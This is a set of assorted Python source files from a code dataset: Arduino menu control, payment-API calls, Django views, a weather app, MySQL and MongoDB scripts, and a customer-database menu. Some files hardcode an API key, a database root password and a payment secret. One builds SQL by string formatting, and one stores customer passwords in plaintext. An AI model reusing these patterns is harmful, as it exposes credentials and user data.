   but1 = board.get_pin(but1_str)\n        but2 = board.get_pin(but2_str)\n        led_camera = board.get_pin(cam_str)\n        led_blue = board.get_pin(blue_str)\n        led_green = board.get_pin(green_str)\n        led_red = board.get_pin(red_str)\n\n        # start the iterator so button presses can be read\n        time.sleep(0.5)\n        iterator = pyfirmata.util.Iterator(board)\n        iterator.start()\n        time.sleep(0.5)\n\n        # if the potentiometer cannot be read, the iterator failed\n        if pot1.read() is None:\n            handle_error(all_errors[ARDUINO_INPUT_ERR], stdscr, PanicMenu=True)\n\n    # if board is a str, the Arduino import failed\n    elif type(board) == str:\n        handle_error(board, stdscr)\n\n    else:\n        # report success once the Arduino imports cleanly\n        print_info(stdscr, all_infos[ARDUINO_CONNECTION_SUCCESS], color=3)\n\n    time.sleep(0.2)\n\n    # endregion\n\n    rv = ArduinoFunctions.led_write(led_blue, led_camera, 1.0)\n    handle_error(rv, stdscr, PanicMenu=True)  # check whether the led write returned an error\n    check_arduino_thread()  # start the thread that watches whether the Arduino is attached\n    time.sleep(0.5)\n\n    while True:\n\n        # in the view-only menus, lock the cursor onto the exit button\n        if cur_stat[\"current_menu\"] == ip_menu_value:\n            cur_stat[\"current_row\"] = 4\n        elif cur_stat[\"current_menu\"] == camera_menu_value:\n            cur_stat[\"current_row\"] = 1\n        elif cur_stat[\"current_menu\"] == info_menu_value:\n            cur_stat[\"current_row\"] = 4\n\n        ##########\n        # screen refresh\n        cur_stat[\"all_menu_elements\"] = refresh_screen(\n            stdscr, key, team_no_pos, cam_offset_pos, cur_stat, settings, team_ip2, led_blue, led_camera,\n        )\n\n        key, ports = ArduinoFunctions.key_get(  # read a value from the Arduino\n            but1, but2, pot1, wait_time_for_get_key\n        )\n\n        if key is None:  # None back from key_get means it errored\n            isKeyError = True\n        else:\n            isKeyError = False\n\n        handle_error(ports, stdscr, PanicMenu=True)  # check for errors\n\n        if key is None:\n            continue\n\n        handle_error(key, stdscr, PanicMenu=True)  # check for errors\n\n        # write the cursor movement into the variables\n        cur_stat[\"current_row\"] = cursor_handler(key, cur_stat)\n\n        ##########\n\n        # see the arduino_check_thread usage notes at the top of the file\n\n        canGoToMM = False\n        for i in cur_stat[\"all_menu_elements\"][main_menu_value][1]:  # match mode only opens when every main-menu status is True\n            if i:\n                canGoToMM = True\n            elif not i:\n                canGoToMM = False\n                break\n\n        # Match Mode\n        if (\n            canGoToMM == True\n            and ArduinoFunctions.map_x(pot1.read(), 0, 1, 0, max_v) == 0  # potentiometer fully left and switch left\n            and ArduinoFunctions.map_xi(swt1.read(), 0, 1, 0, max_v) == max_v\n            and cur_stat[\"current_menu\"] == main_menu_value\n        ):\n            # note: isKeyError lands in the PanicMenu parameter; it is named here to make that explicit\n            match_mode(stdscr, settings, led_blue, led_camera, led_red, led_green, swt1, pot1, PanicMenu=isKeyError)  # start match mode\n        # region settings-menu specials\n        if cur_stat[\"current_menu\"] == 2:  # in the settings menu, read values off the potentiometer\n            if (\n                key not in [\"button1\", \"button0\", \"switch on\", \"switch off\"]\n                and cur_stat[\"current_row\"] == 0  # on the robot-location row\n            ):\n                settings[\"Robot Location\"] = ArduinoFunctions.get_robo_loc_from_inp(\n                    key, max_v\n                )\n\n            elif (\n                key not in [\"button1\", \"button0\", \"switch on\", \"switch off\"]\n                and cur_stat[\"current_row\"] == 1  # on the camera-tolerance row\n            ):\n                settings[\"Camera Tolerance\"] 
= str(key)\n\n elif (\n key not in [\"button1\", \"button0\", \"switch on\", \"switch off\"]\n and cur_stat[\"current_row\"] == 2 # waiting_period'da ise\n ):\n settings[\"Waiting Period\"] = str(key // 2)\n\n elif (\n key not in [\"button1\", \"button0\", \"switch on\", \"switch off\"]\n and cur_stat[\"current_row\"] == 3 # autonomus_mod'da ise\n ):\n settings[\"Autonomous Mode\"] = str(\n ArduinoFunctions.map_x(key, 0, max_v, 0, 5)\n )\n\n if cur_stat[\"current_row\"] == 5 and team_no_pos == 9:\n team_no_pos = 0\n if cur_stat[\"current_row\"] == 4 and cam_offset_pos == 9:\n cam_offset_pos = 0\n\n\n # Team degistirme seysi\n if cur_stat[\"current_row\"] == 5:\n if key == \"button0\": # buton0'a bastığında sonraki haneye geçer\n if team_no_pos < 4:\n team_no_pos += 1\n\n if team_no_pos >= 4:\n team_no_pos = 0\n\n if type(key) == int: # eğer potansiyometre değeri ise o haneye atar\n settings[\"Team Number\"] = (\n settings[\"Team Number\"][0:team_no_pos]\n + str(ArduinoFunctions.map_x(key, 0, max_v, 0, 9))\n + settings[\"Team Number\"][(team_no_pos + 1) : 4]\n )\n\n if cur_stat[\"current_row\"] == 4: \n if key == \"button0\": # buton0'a bastığında sonraki haneye geçer\n if cam_offset_pos < 3:\n cam_offset_pos += 1\n\n if cam_offset_pos >= 3:\n cam_offset_pos = 0\n \n \n if type(key) == int:\n settings[\"Camera Offset\"] = (\n settings[\"Camera Offset\"][0:cam_offset_pos]\n + str(ArduinoFunctions.map_x(key, 0, max_v, 0, 9))\n + settings[\"Camera Offset\"][(cam_offset_pos + 1) : 3]\n )\n\n\n\n if cur_stat[\"current_row\"] != 5:\n team_no_pos = 9 # 9 sadece 0 ile 3 arasinda olmayan bir deger olarak\n\n \n if cur_stat[\"current_row\"] != 4:\n cam_offset_pos = 9 # 9 sadece 0 ile 3 arasinda olmayan bir deger olarak\n\n\n # Write tusu, ayarları JSON dosyasına yazar\n if key == \"button0\" and cur_stat[\"current_row\"] == 6:\n\n rv = DbFunctions.save_settings(file_s, settings)\n handle_error(rv, stdscr, PanicMenu=True)\n\n # if waiting_period is not None:\n # DbFunctions.write_setting_to_txt(waiting_period, file)\n\n all_menu_elements[2] = get_arduino_menu_values(settings)\n\n cur_stat[\"current_menu_elements\"] = all_menu_elements[2][0]\n cur_stat[\"current_menu_status\"] = all_menu_elements[2][1]\n\n # endregion\n\n\n # Menu degistirme olaylari\n cur_stat[\"current_row\"], cur_stat[\"current_menu\"], rv = InputPFunctions.change_menu( \n key, cur_stat, led_green, led_camera\n )\n handle_error(rv, stdscr, PanicMenu=False, clean=False)\n \n # ana menüye dönme\n cur_stat[\"current_row\"], cur_stat[\"current_menu\"], sett = return_to_menu(\n key, cur_stat, stdscr\n )\n (\n cur_stat[\"current_menu_elements\"],\n cur_stat[\"current_menu_status\"],\n ) = set_current_menu(cur_stat, all_menu_elements)\n # team_ip'yi yeniden hesaplama\n team_ip2 = set_tip(settings[\"Team Number\"])\n\n if sett is not None and not type(sett) == 4:\n settings = sett\n\n try:\n rv = check_arduino_thread_rv # arduino takılı mı\n except:\n pass\n else:\n if not rv:\n handle_error(all_errors[ARDUINO_CONN_LOST], stdscr, True) # error verdi mi kontrol\n \ntry:\n curses.wrapper(not_main)\nexcept KeyboardInterrupt:\n try:\n if flash_led.flashthreadopen:\n flash_led.exitthread = True \n except:\n pass\n ","sub_path":"InputPlus.py","file_name":"InputPlus.py","file_ext":"py","file_size_in_byte":57920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"616827773","text":"N=input()\r\nN2,T,C = N,0,1\r\nwhile(True):\r\n for i in range(len(N)):\r\n T+=int(N[i])\r\n if T<10:\r\n if 
len(N2)<=1:\r\n C=0\r\n break\r\n else:\r\n N,T,C = str(T),0,C+1\r\nif T%3==0:\r\n print(str(C)+\"\\nYES\")\r\nelse:\r\n print(str(C)+\"\\nNO\")\r\n","sub_path":"1000-1999/1769.py","file_name":"1769.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"133444155","text":"#Um programa que lê vários números até receber 999(condição de parada) Mostra quantos valores foram inseridos e a soma deles\n\nnum = 0\ncount= 0\nall = []\nsum1 = 0\nsum2 = 0\nvav = 0 \nnum = int(input('Digite um número inteiro qualquer (999 para parar) '))\n\nwhile num != 999:\n count += 1\n sum1 += num \n all.append(num)\n \n while vav < (len(all)):\n sum2 += all[vav] \n vav += 1\n num = int(input('Digite um número inteiro qualquer (999 para parar) '))\n\nprint(f'Ok, você inseriu {count} valores, sendo eles {all} a soma total é {sum1}')\n","sub_path":"Exercicios-mundo-2/desafio064b.py","file_name":"desafio064b.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"286753781","text":"from collections import OrderedDict\nfrom hashlib import sha256\n\nfrom flask import render_template, redirect\n\nimport requests\n\nfrom . import app\nfrom .exceptions import CurrencyNotFound, PiastrixInvoiceRequestError, PiastrixBillRequestError\n\n\nlogger = app.logger\n\n\nclass PiastrixService:\n shop_id = 5\n secretKey = 'SecretKey01'\n payway = 'payeer_rub'\n\n def __init__(self, amount: int = None, currency: str = None, description: str = None, shop_order_id: int = None):\n self.amount = amount\n self.currency = currency\n self.description = description\n self.shop_order_id = shop_order_id\n\n def get_sign(self, data):\n ordered_data = OrderedDict(sorted(data.items()))\n stringify_values = [str(value) for value in list(ordered_data.values())]\n string_for_sign = ':'.join(stringify_values) + self.secretKey\n logger.debug(f\"Raw string for sign: {string_for_sign}\")\n sign = sha256(string_for_sign.encode('utf-8')).hexdigest()\n logger.debug(f\"Sign: {sign}\")\n return sign\n\n def pay(self):\n pay_data = {\n \"currency\": self.currency,\n \"amount\": self.amount,\n \"shop_id\": self.shop_id,\n \"shop_order_id\": self.shop_order_id\n }\n sign = self.get_sign(pay_data)\n pay_data['sign'] = sign\n pay_data['description'] = self.description\n pay_data['url'] = 'https://pay.piastrix.com/ru/pay'\n logger.info(f'Piastrix pay data: {pay_data}')\n return pay_data\n\n def bill(self):\n url = 'https://core.piastrix.com/bill/create'\n data = {\n \"shop_amount\": self.amount,\n \"shop_currency\": self.currency,\n \"shop_id\": self.shop_id,\n \"shop_order_id\": self.shop_order_id,\n \"payer_currency\": self.currency\n }\n sign = self.get_sign(data)\n data['sign'] = sign\n logger.info(f\"Request for piastrix bill: {data}\")\n response = requests.post(url, json=data)\n response = response.json()\n if response['result']:\n logger.info(f\"Piastrix bill response: {response}\")\n url_for_redirect = response['data']['url']\n return url_for_redirect\n else:\n logger.error(f'Error response during piastrix bill: {response}')\n raise PiastrixBillRequestError('Bad request for bill')\n\n def invoice(self):\n url = 'https://core.piastrix.com/invoice/create'\n data = {\n \"amount\": self.amount,\n \"currency\": self.currency,\n \"payway\": self.payway,\n \"shop_id\": self.shop_id,\n \"shop_order_id\": self.shop_order_id,\n }\n sign = self.get_sign(data)\n data['sign'] = sign\n 
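# the sign is a sha256 over the ':'-joined values of the key-sorted request
# fields plus the shop secret (see get_sign above).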
logger.info(f\"Request for piastrix invoice: {data}\")\n response = requests.post(url, json=data)\n response = response.json()\n if response['result']:\n logger.info(f\"Piastrix invoice response: {response}\")\n invoice_data = {\n \"url\": response['data']['url'],\n \"lang\": \"ru\",\n \"m_curorderid\": response['data']['data']['m_curorderid'],\n \"m_historyid\": response['data']['data']['m_historyid'],\n \"m_historytm\": response['data']['data']['m_historytm'],\n \"referer\": response['data']['data']['referer'],\n \"method\": response['data']['method'],\n }\n logger.info(f'Piastrix invoice data: {invoice_data}')\n return invoice_data\n else:\n logger.info(f'Error response during piastrix invoice: {response}')\n raise PiastrixInvoiceRequestError('Bad request for bill')\n\n\ndef get_piastrix_service(amount: int = None, currency: str = None, description: str = None, shop_order_id: int = None):\n return PiastrixService(amount, currency, description, shop_order_id)\n\n\ndef get_piastrix_action(piastrix, currency):\n if currency == '978':\n return render_template('pay.html', data=piastrix.pay())\n if currency == '840':\n return redirect(piastrix.bill())\n if currency == '643':\n return render_template('invoice.html', data=piastrix.invoice())\n else:\n raise CurrencyNotFound('Get invalid code currency')","sub_path":"src/app/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"211205503","text":"import eel\r\nimport pyowm\r\nowm = pyowm.OWM(\"8bdd33f2a79072c140b1e6d317f98af0\")\r\n\r\n@eel.expose\r\ndef get_weather_icon(place):\r\n\t#owm = pyowm.OWM(\"8bdd33f2a79072c140b1e6d317f98af0\")\r\n\tmgr = owm.weather_manager()\r\n\r\n\tobservation = mgr.weather_at_place(place)\r\n\tw = observation.weather\r\n\r\n\tweat = w.status\r\n\r\n\r\n\tprint(weat)\r\n\tprint(place)\r\n\tif weat == 'Mist':\r\n\t\treturn \"https://image.flaticon.com/icons/svg/578/578116.svg\"\r\n\telif weat == 'Clear':\r\n\t\treturn \"https://image.flaticon.com/icons/svg/578/578153.svg\"\r\n\telif weat == 'Clouds':\r\n\t\treturn \"https://image.flaticon.com/icons/svg/578/578116.svg\" #Clouds\r\n\telif weat == 'Rain':\r\n\t\treturn \"https://image.flaticon.com/icons/svg/578/578132.svg\"\r\n@eel.expose\r\ndef get_weather(place):\r\n\r\n\tmgr = owm.weather_manager()\r\n\r\n\tobservation = mgr.weather_at_place(place)\r\n\tw = observation.weather\r\n\tweath = w.status\r\n\ttemp = w.temperature('celsius')['temp']\r\n\r\n\treturn \"В \" + place + \" сейчас \" + str(temp) + \" градусов\"\r\n\r\n\r\neel.init(\"webs\")\r\neel.start(\"main.html\", size=(800, 700))\r\n","sub_path":"HTML APP/Build 1.0.0.a1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"478858603","text":"import pandas as pd\r\n\r\nclosed_count_url = 'http://cwprod/CATSWebNET/main.aspx?WCI=Main&WCE=SubmitQry&WCU=%7c*%7eq%3d8%7c*%7er%3d24c370aa8efa4db78f7fafd5dd0c8593%7c*%7ef%3d-1%7c*%7eo%3d3%7c*%7ep%3dComplaint%20Folder%7c*%7es%3d8P7LQMWZINV3YGT8IYTKSBAE939R21HD' \r\n\r\ndef createDataframe(url):\r\n df_html = pd.read_html(url)\r\n data_table = df_html[1]\r\n\r\n col_names = list()\r\n\r\n for index, row in data_table.iloc[[0]].iterrows():\r\n for i in range(len(data_table.columns)):\r\n col_names.append(row[i])\r\n\r\n data_table.columns = col_names\r\n data_table = data_table.drop(data_table.index[0])\r\n data_table = 
data_table.set_index('Complaint Number')\r\n return data_table\r\n\r\n#df_closed = createDataframe(closed_count_url)\r\n\r\ndf_140 = pd.read_pickle('Overall_140.pickle')\r\ndf_140['Decision Date'] =pd.to_datetime(df_140['Decision Date'])\r\n\r\ndesc = df_140.sort_values('Decision Date', ascending=False)\r\ndesc.to_excel('desc.xlsx')\r\n\r\nasce = df_140.sort_values('Decision Date')\r\nasce.to_excel('asce.xlsx')\r\n\r\n#df_140_unique = pd.DataFrame(df_140['Complaint Folder'].unique(), columns=['Complaint Folder',])\r\n\r\n#print(df_140_unique.head())\r\n","sub_path":"closedCount.py","file_name":"closedCount.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"652549413","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom forum.models import Forum, Thread, Post\nfrom django.core.urlresolvers import reverse\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\ndef home(request):\n forums = Forum.objects.all()\n context = {'forums':forums}\n return render(request, \"forum/home.html\", context)\n\ndef paginate(request, items, page_limit):\n paginator = Paginator(items, page_limit)\n page_num = request.GET.get('page')\n try:\n page_of_items = paginator.page(page_num)\n except PageNotAnInteger:\n page_of_items = paginator.page(1)\n except EmptyPage:\n page_of_items = paginator.page(paginator.num_pages)\n return page_of_items\n\ndef forum(request, pk):\n \"\"\"List threads in a forum.\"\"\"\n threads = Thread.objects.filter(forum=pk).order_by(\"-created\")\n page_of_threads = paginate(request, threads, 5)\n context = {'threads': page_of_threads, 'pk':pk}\n return render(request, 'forum/forum.html', context)\n\ndef thread(request, pk):\n \"\"\"Listing of posts in a thread.\"\"\"\n posts = Post.objects.filter(thread=pk).order_by(\"-created\")\n posts = paginate(request, posts, 7)\n thread = Thread.objects.get(pk=pk)\n title = thread.title\n forum_pk = thread.forum.pk\n context = {'posts': posts, \n 'pk': pk, \n 'title': title,\n 'forum_pk': forum_pk}\n return render(request, \"forum/thread.html\", context)\n\ndef post(request, post_type, pk):\n \"\"\"Display a post form.\"\"\"\n action = reverse(\"forum.views.%s\" % post_type, args=[pk])\n if post_type == \"new_thread\":\n title = \"Start New Topic\"\n subject = ''\n elif post_type == \"reply\":\n title = \"Reply\"\n subject = \"Re: \" + Thread.objects.get(pk=pk).title\n context = {'action' : action, \n 'title' : title,\n 'subject': subject}\n return render(request, \"forum/post.html\", context)\n\ndef new_thread(request, pk):\n \"\"\"Start a new thread.\"\"\"\n p = request.POST\n if p[\"subject\"] and p[\"body\"]:\n forum = Forum.objects.get(pk=pk)\n thread_details = {'forum': forum, \n 'title': p[\"subject\"], \n 'creator': request.user}\n thread = Thread.objects.create(**thread_details)\n post_details = {'thread': thread, \n 'body': p[\"body\"], \n 'title': p[\"subject\"], \n 'creator': request.user}\n Post.objects.create(**post_details)\n forum_url = reverse(\"forum.views.forum\", args=[pk])\n return HttpResponseRedirect(forum_url)\n else:\n error_message = \"You didn't provide the required details\"\n context = {'error_message': error_message}\n return render(request, 'forum/post_error.html', context)\n\ndef reply(request, pk):\n \"\"\"Reply to a thread.\"\"\"\n p = request.POST\n if p[\"body\"]:\n thread = Thread.objects.get(pk=pk)\n post_details = {'thread': thread, 
\n 'body': p[\"body\"],\n 'title': p[\"subject\"], \n 'creator': request.user}\n post = Post.objects.create(**post_details)\n thread_url = reverse(\"forum.views.thread\", args=[pk]) \n return HttpResponseRedirect(thread_url + \"?page=last\")\n else:\n error_message = \"You didn't provide a reply body\"\n context = {'error_message': error_message}\n return render(request, 'forum/post_error.html', context)","sub_path":"part-four/forum_project/forum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"324799678","text":"from __future__ import print_function\n\nimport argparse\nimport numpy as np\nimport glob\nimport os\nimport ipdb\n\ndef _command_line_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-o',\n '--output',\n type=str,\n default='outputs/sources')\n parser.add_argument(\n '-m',\n '--maps',\n type=str,\n required=True)\n\n return parser\n\nWALL_TYPE = np.int8\nWALL = 0\nEMPTY = 1\n\nclass Maze:\n def __init__(self, map_filepath):\n assert os.path.exists(map_filepath)\n with open(map_filepath, 'r') as fd:\n def _process_map_str(token):\n return WALL if token == '#' else EMPTY\n # Generate map for maze\n board = np.array([ [ _process_map_str(char) for char in line.strip('\\n') ] \\\n for line in fd.readlines() ], dtype=WALL_TYPE)\n\n self.board = board\n self.nrows = board.shape[0]\n self.ncolumns = board.shape[1]\n\n def __str__(self):\n return os.linesep.join(''.join('X' if self.is_wall(i, j) else ' '\n for j in range(self.ncolumns))\n for i in range(self.nrows))\n\n def __hash__(self):\n return hash(self.board.tostring())\n\n def __eq__(self, other):\n return np.array_equal(self.board, other.board)\n\n def set_borders(self):\n self.board[0, :] = self.board[-1, :] = WALL\n self.board[:, 0] = self.board[:, -1] = WALL\n\n def is_wall(self, x, y):\n assert self.in_maze(x, y)\n return self.board[x][y] == WALL\n\n def set_wall(self, x, y):\n assert self.in_maze(x, y)\n self.board[x][y] = WALL\n\n def remove_wall(self, x, y):\n assert self.in_maze(x, y)\n self.board[x][y] = EMPTY\n\n def in_maze(self, x, y):\n return 0 <= x < self.nrows and 0 <= y < self.ncolumns\n\n def write_to_file(self, filename):\n f = open(filename, 'w')\n f.write(str(self))\n f.close()\n\nif __name__ == '__main__':\n parser = _command_line_parser()\n FLAGS = parser.parse_args()\n\n print(FLAGS.maps)\n map_filepaths = glob.glob(os.path.join(FLAGS.maps, '*.txt'))\n mazes = set()\n for idx, map_filepath in enumerate(map_filepaths):\n print('Processing {}'.format(map_filepath))\n maze = Maze(map_filepath)\n maze_name = \"{}\".format(os.path.basename(map_filepath))\n\n maze.write_to_file(os.path.join(FLAGS.output, maze_name))\n","sub_path":"maze_from_gridworld.py","file_name":"maze_from_gridworld.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"635544645","text":"\"\"\"Views for managing suppliers.\"\"\"\n\nfrom django.shortcuts import get_object_or_404\nfrom django.urls import reverse_lazy\nfrom django.views.generic.base import RedirectView, TemplateView\nfrom django.views.generic.edit import CreateView, DeleteView, UpdateView\n\nfrom inventory import models\n\nfrom .views import InventoryUserMixin\n\n\nclass Suppliers(InventoryUserMixin, TemplateView):\n \"\"\"View for the list of suppliers.\"\"\"\n\n template_name = \"inventory/suppliers.html\"\n\n def 
get_context_data(self, *args, **kwargs):\n \"\"\"Add suppliers to the template context.\"\"\"\n context = super().get_context_data(*args, **kwargs)\n context[\"active_suppliers\"] = models.Supplier.objects.filter(active=True)\n context[\"inactive_suppliers\"] = models.Supplier.objects.filter(active=False)\n return context\n\n\nclass Supplier(InventoryUserMixin, TemplateView):\n \"\"\"View for supplier details.\"\"\"\n\n template_name = \"inventory/supplier.html\"\n\n def get_context_data(self, *args, **kwargs):\n \"\"\"Add supplier to the template context.\"\"\"\n context = super().get_context_data(*args, **kwargs)\n context[\"supplier\"] = get_object_or_404(models.Supplier, id=self.kwargs[\"pk\"])\n context[\"contacts\"] = context[\"supplier\"].supplier_contacts.all()\n return context\n\n\nclass CreateSupplier(InventoryUserMixin, CreateView):\n \"\"\"View for creating suppliers.\"\"\"\n\n model = models.Supplier\n fields = [\"name\"]\n\n\nclass ToggleSupplierActive(InventoryUserMixin, RedirectView):\n \"\"\"View to toggle the activation status of a supplier.\"\"\"\n\n def get_redirect_url(self, *args, **kwargs):\n \"\"\"Toggle the active status of a supplier.\"\"\"\n supplier = get_object_or_404(models.Supplier, pk=kwargs[\"pk\"])\n supplier.active = not supplier.active\n supplier.save()\n return supplier.get_absolute_url()\n\n\nclass CreateSupplierContact(InventoryUserMixin, CreateView):\n \"\"\"View for creating supplier contacts.\"\"\"\n\n model = models.SupplierContact\n fields = [\"name\", \"phone\", \"email\", \"notes\"]\n\n def form_valid(self, form):\n \"\"\"Add the supplier to the contact object.\"\"\"\n self.object = form.save(commit=False)\n self.object.supplier = get_object_or_404(\n models.Supplier, pk=self.kwargs[\"supplier_pk\"]\n )\n self.object.save()\n return super().form_valid(form)\n\n def get_context_data(self, *args, **kwargs):\n \"\"\"Add supplier to the template context.\"\"\"\n context = super().get_context_data(*args, **kwargs)\n context[\"supplier\"] = get_object_or_404(\n models.Supplier, pk=self.kwargs[\"supplier_pk\"]\n )\n return context\n\n\nclass UpdateSupplierContact(InventoryUserMixin, UpdateView):\n \"\"\"View for updating supplier contacts.\"\"\"\n\n model = models.SupplierContact\n fields = [\"name\", \"phone\", \"email\", \"notes\"]\n\n def get_context_data(self, *args, **kwargs):\n \"\"\"Add supplier to the template context.\"\"\"\n context = super().get_context_data(*args, **kwargs)\n context[\"supplier\"] = context[\"form\"].instance.supplier\n return context\n\n\nclass DeleteSupplierContact(InventoryUserMixin, DeleteView):\n \"\"\"View for deleting supplier contacts.\"\"\"\n\n model = models.SupplierContact\n\n def get_success_url(self):\n \"\"\"Return the URL to redirect to after a successful deletion.\"\"\"\n instance = get_object_or_404(models.SupplierContact, id=self.kwargs[\"pk\"])\n return reverse_lazy(\"inventory:supplier\", args=[instance.supplier.id])\n","sub_path":"inventory/views/suppliers.py","file_name":"suppliers.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"340196316","text":"#!/usr/bin/python\r\n\r\nimport sys\r\nimport os\r\nimport subprocess\r\nimport datetime\r\nimport pymongo\r\nfrom pymongo import MongoClient\r\n\r\nmongo_url = os.getenv('MONGOLAB_URI', 'mongodb://localhost:27017')\r\n\r\n# add status to mongo\r\nclient = MongoClient(mongo_url)\r\nif 'localhost' in mongo_url:\r\n db = client.scfd\r\nelse:\r\n # for Heroku\r\n db = 
client.get_default_database()\r\n \r\nrunstatus = {\"runname\": sys.argv[1],\r\n \"description\": sys.argv[1],\r\n \"status\": \"1\",\r\n \"date\": datetime.datetime.utcnow()}\r\n\r\nrunstatus_id = db.runstatus.insert(runstatus)\r\n \r\nrunstatus1 = db.runstatus.find_one({\"_id\": runstatus_id})\r\n\r\np = subprocess.Popen(['SU2_CFD', sys.argv[2]], cwd=\"run_\" + sys.argv[1]) \r\np.communicate()\r\n\r\nrunstatus1[\"status\"] = \"2\"\r\nrunstatus1[\"date\"] = datetime.datetime.utcnow()\r\n \r\ndb.runstatus.save(runstatus1)\r\n","sub_path":"spawn-cfd-proc.py","file_name":"spawn-cfd-proc.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"269151325","text":"#!/usr/bin/pythonw\n# encoding:utf-8\n\nimport MySQLdb\n\ndb = MySQLdb.connect(\"master\", \"root\", \"zhangwei\", \"isee\")\n\ncursor = db.cursor()\nsql = \"select * from sys_user \\\n where id ='%s'\" % (\"0bde947230f64272bed1a370b7c9347d\")\ntry:\n cursor.execute(sql)\n result = cursor.fetchall()\n for row in result:\n fid = row[0]\n fname = row[1]\n fage = row[3]\n fmail = row[4]\n print(\"fid = %s , fname = %s , fage = %d ,fmail = %s\" \\\n % (fid, fname, fage, fmail))\nexcept:\n print(\"Error : unable to fetch data\")\n\ndb.close()\n","sub_path":"src/python/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"345573027","text":"#Program created by Sebastian Larsen\n#date = 17/05-2021\n\n\nimport IKEA_Gruppe1Connect as thisDatabase\nfrom beautifultable import BeautifulTable\nimport time\n\n#connect to database\nthisConn = thisDatabase.dbconnect()\n\n#This function creates a beautifultable from the data reterived from IKEA DATABASE\ndef prettyprint(result):\n\ttable = BeautifulTable()\n\ttable.column_header = [\"Costumer_ID\", \"Email\", \"Reg_date\", \"First_name\", \"Last_name\", \"Phone_number\", \"Password\", \"Country\", \"Default_shipping_Addr\"]\n\tfor row in result:\n\t\ttable.rows.append(row)\n\tprint(table)\n\nmycursor = thisConn.cursor()\nmycursor.execute(\"select * From Customer\")\nmyRecords = mycursor.fetchall()\n\n\n\n# -----------------------------------------------\n#Here the program ask user to add a new customer\n\ndef Create_new_user():\n\tEmail = input(\"Insert Email: \\n\")\n\tFirst_name = input(\"Insert First name: \\n\")\n\tLast_name = input(\"Insert Last name: \\n\")\n\tPhone_number = int(input(\"Insert Phone_number: \\n\"))\n\tCountry = input(\"Insert Country: \\n\")\n\tPassword = input(\"Insert password: \\n\")\n\n\t\n\t\n\tsql = \" INSERT INTO Customer(Email, First_name, Last_name, Phone_number, Country, Password) VALUES (%s,%s,%s,%s,%s,%s)\"\n\tval = (Email, First_name, Last_name, Phone_number, Country, Password)\n\n\tmycursor = thisConn.cursor()\n\tmycursor.execute(sql, val)\n\tthisConn.commit()\n\tprint(\"User succesfully created\")\n\n\n\n#-----------------------------------------------\n#Here the program show the latest added user created\n\ndef Latest_added(result):\n\tsql = \"\"\"\n\tSELECT \n *\n FROM\n Customer\n ORDER BY Customer_ID DESC\n LIMIT 1\n\t\"\"\"\n\n\tmycursor = thisConn.cursor()\n\tmycursor.execute(sql)\n\tmyRecords = mycursor.fetchall()\n\n\n\ttable = BeautifulTable()\t\t\t\t\n\ttable.columns.header = [\"Customer info\"] \n\ttable.rows.append(myRecords)\n\n\tprint(table)\n\t\n\n#--------------------------------------------------\n#Creating a variable called \"title\", 
that combined with the fuction below \"hello\" makes the program smooth\ntitle = \"\\t\\t\\tMENU\\t\\t\\t\"\n\ndef hello():\n print(\"\\033[H\\033[J\") \n print(title)\n print(\"\\n\")\n\n\ndef main_menu():\n\thello()\n\toptions = [\n\t\t\"Print Customer table from IKEA DATABASE\",\n\t\t\"Create new user\",\n\t\t\"show latest user created\",\n\t\t\"Exit Program\\n\"\n\t\t]\n\tprint(\"Enter a number to select an option:\\n\")\n\tfor d, options in enumerate(options):\n\t\tprint(\"[\" + str(d + 1) + \"] \" + options)\n\n\tchoice = int(input(\"Select an option [1] - [4]: \"))\n\n\n\tif choice in range(1,7):\n\t\tif choice == 1:\n\t\t\ttime.sleep(1)\n\t\t\tprettyprint(myRecords)\n\t\t\ttime.sleep(5)\n\t\t\tmain_menu()\n\t\t\t\n\n\t\telif choice == 2:\n\t\t\ttime.sleep(1)\n\t\t\tCreate_new_user()\n\t\t\ttime.sleep(4)\n\t\t\tmain_menu()\n\n\n\t\telif choice == 3:\n\t\t\ttime.sleep(1)\n\t\t\tLatest_added(myRecords)\n\t\t\ttime.sleep(5)\n\t\t\tmain_menu()\n\n\t\telif choice == 4:\n\t\t\thello()\n\t\t\tprint(\"\\n\")\n\t\t\tprint(\"Quitting.....\")\n\t\t\ttime.sleep(1.5)\n\t\t\texit()\n\telse:\n\t\tprint(\"I dont know this action..\")\n\t\ttime.sleep(2)\n\t\tmain_menu()\n\n#her bliver funktionen main_menu() initialiseret\nmain_menu()","sub_path":"IKEA_gruppe1Python.py","file_name":"IKEA_gruppe1Python.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"619269470","text":"# -*- coding: utf-8 -*-\n\"\"\"\nUSING THEANO\nBuild a 3-layer neural network with 1 input layer, 1 hidden layer and 1 output layer. \n The number of nodes in the input layer is 2; the dimensionality of our data.\n The number of nodes in the output layer is 2; the number of 